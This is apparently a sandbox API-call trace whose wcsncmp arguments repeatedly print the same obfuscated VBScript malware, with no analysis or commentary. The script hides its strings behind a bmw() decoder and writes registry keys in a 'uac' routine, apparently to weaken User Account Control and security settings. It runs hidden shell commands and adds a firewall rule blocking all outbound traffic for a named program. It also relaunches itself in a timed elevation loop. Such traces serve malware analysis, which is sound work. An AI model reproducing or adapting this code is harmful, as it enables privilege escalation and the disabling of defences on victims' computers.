bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 89 [0226.342] wcsncmp (_String1="or each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 98 [0226.343] wcsncmp (_String1="r each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 101 [0226.343] wcsncmp (_String1=" each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.343] wcsncmp (_String1="each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", 